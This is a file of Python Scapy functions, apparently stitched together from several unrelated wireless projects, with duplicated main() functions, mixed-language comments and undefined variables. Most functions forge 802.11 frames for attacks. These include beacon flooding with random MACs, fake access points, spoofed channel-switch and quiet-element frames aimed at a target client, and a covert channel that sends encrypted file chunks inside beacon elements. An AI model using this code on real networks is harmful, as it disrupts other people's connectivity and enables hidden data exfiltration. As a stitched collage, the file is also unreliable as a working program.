def stormWithBeaconFrames():
global interfaceName
global monitorInterface
log("Starting with storming on interface [{}]".format(interfaceName))
netSSID = 'testSSID' #Network name here
iface = 'wlan0mon' #Interface name here
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
frame.show()
print("\nHexdump of frame:")
hexdump(frame)
raw_input("\nPress enter to start\n")
sendp(frame, iface=iface, inter=0.100, loop=1)
def createAccessPoint(interface, ssid):
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2='22:22:22:22:22:22',
addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
log.info("Beacon Frame created with SSID: '" + ssid + "'")
log.info("Transmitting Beacon through interface '" + interface + "'")
raw_input("\nPress Enter to start Access Point '" + ssid + "'\n")
log.success("Access Point Created!")
sendp(frame, iface=interface, inter=0.10, loop=1)
def ssidSpawner(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
frames = []
while True:
#for netSSID in ssids:
netSSID = id_generator()
print(netSSID)
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
print("SSID=%-20s %r"%(netSSID,frame))
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)
def quietAttack(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x01\x00')) #RSN Capabilities (no extra capabilities)
quiet = Dot11Elt(ID='Quiet', info=(
'\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct)
'\x00' #Quiet period | #0 indicates no quiet periods are scheduled. A non-zero value indicates the number of beacon intervals between each period.
'\x00\x10' #Quiet duration | length of quiet period in time units (TU).
'\x00\x00')) #Quiet offset | possiblity to specify other start time than right after beacon in TU, But has to be shorther than beacon interval.
frame = RadioTap()/dot11/beacon/essid/quiet
printTime()
while(time.time() < timeToRun):
sendp(frame, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
printTime()
def test():
netSSID = 'testSSID' #Network name here
iface = 'mon5' #Interface name here
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',
addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
frame.show()
print("\nHexDump of frame:")
hexdump(frame)
raw_input("\nPress enter to start\n")
sendp(frame, iface=iface, inter=0.100, loop=1)
def send_file(filename):
print("[*] Sending data...")
f = open(filename, 'rb')
file_size, chunks, r_size = stat_file(filename)
pos = 0
start = time.time()
for seq in range(chunks):
m_seq = str(seq)
#print(f"\t[i] tag: {m_seq}")
seq_c = box.encrypt(bytes(m_seq, 'ascii'))
_seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
#print(f"\t[i] tag size: {len(_seq)}")
chunk = f.read(r_size) # crypto ovh + element ovh
chunk_c = box.encrypt(chunk)
_data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
#print(f"\t[i] encrypted data size: {len(chunk_c)}")
_frame = t_frame / _seq / _data
sendp(_frame, iface=if0, verbose=0, realtime=True)
tell = f.tell()
print(
f"\t[i] sent frame {seq} of {chunks}, data[{pos}:{tell}], frame size: {len(_frame)}"
)
pos = tell
#input("[debug check]")
end = time.time()
print(f"[*] sent {chunks} in {end - start} seconds")
band = (chunks * 325) / (end - start)
print(f"[*] speed: {(band * 8) / 1000} kbps")
print("[*] listening for chunk resend")
sniff(iface=opt.iface, stop_filter=check_missing, monitor=True)
print("[*] done!")
def main():
ssids = sys.argv[2:] #Network name here
iface = sys.argv[1] #Interface name here
frames = []
for netSSID in ssids:
print netSSID
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))
rsn = Dot11Elt(
ID='RSNinfo',
info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap() / dot11 / beacon / essid / rsn
print "SSID=%-20s %r" % (netSSID, frame)
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def main():
if len(sys.argv) < 3:
print("usage: %s <interface> <words of name>" % sys.argv[0])
sys.exit(1)
iface = sys.argv[1]
name = ' '.join(sys.argv[2:])
frames = []
for suffix in ap_slander:
ssid = name + ' ' + suffix.upper()
print(ssid)
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(
ID='RSNinfo',
info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap() / dot11 / beacon / essid / rsn
#print("SSID=%-20s %r"%(ssid,frame))
frames.append(frame)
sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def create_beacon(name, password_protected=False):
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=str(RandMAC()),
addr3=str(RandMAC()))
beacon = Dot11Beacon(
cap='ESS+privacy' if password_protected else 'ESS')
essid = Dot11Elt(ID='SSID', info=name, len=len(name))
if not password_protected:
return RadioTap() / dot11 / beacon / essid
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
return RadioTap() / dot11 / beacon / essid / rsn
def channelSwitchAttack(config):
frame = ""
frameType = "beacon" #choose betweeen action_frame or beacon.
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"]))
if(frameType == "action_frame"):
dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
category = ('\x00' # spectrum management
'\x04') #channel switch announcement
csa = Dot11Elt(ID='Channel Switch', info=(
'\x00' #Channel switch mode
'\x04' #new channel ))
'\x00')) #channel switch cnt
frame = RadioTap()/dot11/category/csa
elif(frameType == "beacon"):
dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
csa = Dot11Elt(ID='Channel Switch', info=(
'\x00' #Channel switch mode
'\x64' #new channel ))
'\x00')) #channel switch cnt
frame = RadioTap()/dot11/beacon/essid/csa
printTime()
while(time.time() < timeToRun):
#frame.show()
sendp(frame, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
printTime()
def recv_missing(tally):
msg = ":".join(str(x) for x in tally)
msg_c = box.encrypt(msg.encode('utf-8'))
fname = t_file
fname_c = box.encrypt(t_file.encode('utf-8'))
_data = Dot11Elt(ID=224, info=msg_c, len=len(msg_c))
_fname = Dot11Elt(ID=225, info=fname_c, len=len(fname_c))
sendp(t_frame / _data / _fname, iface=opt.iface)
def probe_resp(self, message):
subtype = 5
frame = self.base_frame(subtype, message=message)
rates = Dot11Elt(ID='Rates', info=self.rates)
dsset = Dot11Elt(ID='DSset', info=self.dsset)
frame = frame / rates / dsset
print("[*] 802.11 Probe Response: SSID = %s" % self.net_ssid)
sendp(frame, iface=self.interface, inter=0.100, loop=0, verbose=False)
def probe_req(self, message=''):
subtype = 4
frame = self.base_frame(subtype, message=message)
rates = Dot11Elt(ID='Rates', info=self.rates)
dsset = Dot11Elt(ID='DSset', info=self.dsset)
frame = frame / rates / dsset
print("[*] 802.11 Probe Request: SSID = %s" % self.net_ssid)
srp(frame)
def build(name):
dot11_header = Dot11(type=0,
subtype=8,
addr1=dest,
addr2=source,
addr3=source)
beacon = Dot11Beacon(cap=0x1111)
data = (
beacon / Dot11Elt(ID="SSID", info=ssid(name)) /
Dot11Elt(ID="Rates", info=bytes([140, 18, 152, 36, 176, 72, 96, 108])))
return RadioTap() / dot11_header / data
def geracao_pacotes(self):
netSSID = 'testSSID'
iface = 'wlp3s0mon' #Nome da Interface Wireless
mac_forjado_pr = self.criacao_mac_ponto_referencia()
numero_pacotes = int(self.numero_pacotes.get())
intervalo_envio = float(self.intervalo.get())
## addr1 = MAC de destino (MAC da placa wireless)
## addr2 = Endereco MAC de origem do remetente. (MAC forjado)
## addr3 = Endereco MAC do ponto de acesso.
dot11 = Dot11(type=0,
subtype=8,
addr1='E4:18:6B:4B:94:00',
addr2=mac_forjado_pr,
addr3='33:33:33:33:33:33')
beacon = Dot11Beacon(
cap='ESS+privacy') ## indica a capacidade do ponto de acesso
essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
frame.show()
print("HexDump of frame")
hexdump(frame)
a = sendp(frame / "RURALRURALRURAL",
iface=iface,
inter=intervalo_envio,
loop=0,
count=numero_pacotes
) # inter = intervalo entre o envio dos pacotes
print(a)
self.atualizar_tela()
def encapsulate(payload, addr_from, addr_to=BroadcastAddress):
from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap
radio = RadioTap()
dot11 = Dot11(type=0,
subtype=8,
addr1=addr_to,
addr2=SignatureAddress,
addr3=addr_from)
beacon = Dot11Beacon(cap='ESS')
frame = radio / dot11 / beacon
data_size = len(payload)
data_left = data_size
data_off = 0
chunk_size = 255
while data_left > 0:
sz = min(chunk_size, data_left)
chunk = payload[data_off:data_off + sz]
frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=chunk, len=sz)
data_off += sz
data_left -= sz
return frame
def create_packet(packet):
#hexdump(packet)
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# calculate the new channel
newChannel = (channel + 6) % 11
# get the end of the original packet
oldEltend = packet[Dot11Elt][3]
# get the content of original packet
newPacket = packet
# change the DSset to the new calculate value. This will clear everything that follows
newPacket[Dot11Elt][2] = Dot11Elt(ID='DSset',
info=chr(newChannel),
len=1)
# concatenate the end of the packet with what we created before
finalPacket = newPacket / oldEltend
# send the packet until user stop it
sendp(finalPacket, iface=args.Interface, inter=0.10, loop=1)
def send_stat(filename):
file_size, chunks, r_size = stat_file(filename)
print("[*] Sending file stat frame...")
payload = f"{file_size}:{chunks}".encode('ascii')
payload_c = box.encrypt(payload)
_payload = Dot11Elt(ID=222, info=payload_c, len=len(payload_c))
tmp_frame = t_frame / _payload
sendp(tmp_frame, iface=if0, verbose=0, realtime=True)
def sendAssocReq():
#packet to client
dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"])
auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1)
essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk"))
#rsn omzetten naar Dot11EltRSN
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/auth/essid#/rsn
frame.show()
sendp(frame, iface=config["iface"], inter=0.100, loop=0)
def send_chunks(filename, chunk_list):
file_size, chunks, r_size = stat_file(filename)
with open(filename, 'rb') as f:
for seq in chunk_list:
m_seq = str(seq)
seq_c = box.encrypt(bytes(m_seq, 'ascii'))
_seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
chunk_offset = (r_size * seq)
f.seek(chunk_offset)
chunk = f.read(r_size)
chunk_c = box.encrypt(chunk)
_data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
_frame = t_frame / _seq / _data
sendp(_frame, iface=if0, verbose=0, realtime=True)
tell = f.tell()
print(
f"\t[i] resent frame {seq} of {chunks}, data[{chunk_offset}:{tell}], frame size: {len(_frame)}"
)
def gen_packet(ssid, source_mac):
dot11 = Dot11(type=0,
subtype=8,
addr1="ff:ff:ff:ff:ff:ff",
addr2=source_mac,
addr3=source_mac)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
rsn = Dot11Elt(ID="RSNinfo",
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
return frame
def send_beacon(mac, ssid, verbose = False):
dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap() / dot11 / beacon / essid
if verbose:
print(f"Sending beacon: {ssid}")
sendp(frame, inter=0.1, loop=1, iface=interface, verbose=0)
def _send_802_11_frame(self, ssid):
dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",
addr2=self.ap.ip,addr3=self.ap.ip)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID',info=ssid,len=len(ssid))
radiotap = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' +
get_frequency(self.ap.ch) +
'\xc0\x00\xc0\x01\x00\x00')
frame = radiotap/dot11/beacon/essid
sendp(frame, iface=self.ap.iface, verbose=False)
def __beacon_send(self, ssid, inter, enc):
addr2 = gu.rand_mac()
addr3 = gu.rand_mac()
dot11 = Dot11(type=0,
subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=addr2,
addr3=addr3)
beacon = Dot11Beacon(cap='ESS')
beacon_enc = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(
ID='RSNinfo',
info=
('\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00'
))
if enc:
frame = RadioTap() / dot11 / beacon_enc / essid / rsn
else:
frame = RadioTap() / dot11 / beacon / essid
sendp(frame, iface=self.iface, inter=inter, loop=1)
def size_test_breadth():
global box, t_frame, if0
for i in range(65535):
try:
m = box.encrypt(('A' * i).encode('ascii'))
t_elt = Dot11Elt(ID=253, info=m, len=len(m))
t_elt2 = Dot11Elt(ID=254, info=m, len=len(m))
sendp(t_frame / t_elt / t_elt2,
iface=if0,
loop=0,
inter=0.100,
count=1,
verbose=0)
#input("Continue...")
except Exception as e:
print("[t] Fail at frame: {}, size: {}\n[e] {}".format(
i, i * 4, str(e)))
#raise e
return False
print("[t] absolute unit!")
return True
def send(self, ssid='Input your SSID'):
random_mac_addr = utils.rand_mac()
dot11 = Dot11(
type=0,
subtype=8, # type : management frame, subtype: beacon frame
addr1='ff:ff:ff:ff:ff:ff',
addr2=random_mac_addr,
addr3=random_mac_addr)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
rsn = Dot11Elt(ID='RSNinfo',
info=('\x01\x00'
'\x00\x0f\xac\x02'
'\x02\x00'
'\x00\x0f\xac\x04'
'\x00\x0f\xac\x02'
'\x01\x00'
'\x00\x0f\xac\x02'
'\x00\x00'))
frame = RadioTap() / dot11 / beacon / essid / rsn
sendp(frame, iface=self.interface, inter=0.100, loop=1)
def base_frame(self, subtype, message=''):
frame_type = ''
fc = 0
if subtype == 4:
frame_type = Dot11ProbeReq()
elif subtype == 5:
frame_type = Dot11ProbeResp()
elif subtype == 8:
frame_type = Dot11Beacon(cap='ESS')
dot11 = Dot11(
type='Management',
subtype=subtype,
FCfield=fc, # subtype=(4: Probe Request, 8: Beacon)
addr1=self.dst, # Receiver address
addr2=self.source, # Transmitter address
addr3=self.bssid) # BSSID
essid = Dot11Elt(ID='SSID', info=self.net_ssid, len=len(self.net_ssid))
base_frame = RadioTap() / dot11 / frame_type / essid
if not message:
return []
data = str.encode(message)
payload = Dot11Elt(ID='vendor', info=data, len=len(data))
frame = base_frame / payload
return frame
def quietActionAttack(config):
#enable monitor mode and set the channel.
setMonitorMode(config["iface"])
setChannel(str(config["iface"]), config["channel"])
timeToRun = (time.time() + config["time"])
dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
category = ('\x04' # public action
'\x04') #channel switch announcement
csa = Dot11Elt(ID='Extended Channel Switch Announcement', info=(
'\x00' #Channel switch mode
'\x0B' #new channel ))
'\x00')) #channel switch cnt
quiet = Dot11Elt(ID='Quiet', info=(
'\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct)
'\x00' #Quiet period | #of beacon intervals to wait in between
'\x00\x40' #Quiet duration | length of quiet period in time units (TU)
'\x00\x00')) #Quiet offset | possiblity to specify another offset after start time. Unclear?
frame = RadioTap()/dot11/category/csa
printTime()
while(time.time() < timeToRun):
sendp(frame, iface=config["iface"], loop=0, verbose=0)
time.sleep(config["interval"])
printTime()
def geracao_pacotes():
nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ')
mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia)
tempo_execucao = float(input("Insira o tempo de execucao (minutos): "))
print('\n_________________________________________')
intervalo_envio = float(
input(
"Insira o intervalo de frequencia de envio de pacotes (em segundos) : "
))
print('\n_________________________________________')
num_pacotes = (tempo_execucao * 60) / intervalo_envio
data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ"
## addr1 = MAC de destino (MAC da placa wireless)
## addr2 = Endereco MAC de origem do remetente. (MAC forjado)
## addr3 = Endereco MAC do ponto de acesso.
dot11 = Dot11(type=2,
subtype=0,
addr1='E4:18:6B:4B:94:00',
addr2=mac_forjado_pr,
addr3='33:33:33:33:33:33')
essid = Dot11Elt(
ID='SSID', info='testSSID',
len=len('testSSID')) # indica a capacidade do ponto de acesso
frame = RadioTap() / dot11 / essid / data
frame.show()
input("Digite enter para o inicio do envio de pacotes:")
sendp(
frame,
iface='wlp3s0mon',
inter=intervalo_envio,
loop=0,
count=num_pacotes
) # iface = Nome da Interface Wireless. inter = intervalo entre o envio dos pacotes (em segundos). count = numero de pacotes
escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
def send_beacon_frame(self, inter=0.010, loop=0):
# packet duration is 736us in 1Mbps
SSID = '000000-0000-0000'
mpdu_header = Dot11(type=0,
subtype=8,
addr1=self.bc_mac,
addr2=self.tx_mac,
addr3=self.bssid)
beacon = Dot11Beacon(timestamp=0, beacon_interval=100, cap=0)
essid = Dot11Elt(ID='SSID', info=SSID, len=len(SSID))
vendor_data = Dot11EltVendorSpecific(len=None,
oui=0x544a55,
info=(b'\x00' + b'\x00' * 8))
frame = self.get_legacy_radiotap(
rate=1) / mpdu_header / beacon / essid / vendor_data
# hexdump(raw(frame))
sendp(frame, iface=self.iface, inter=inter, loop=loop, verbose=False)
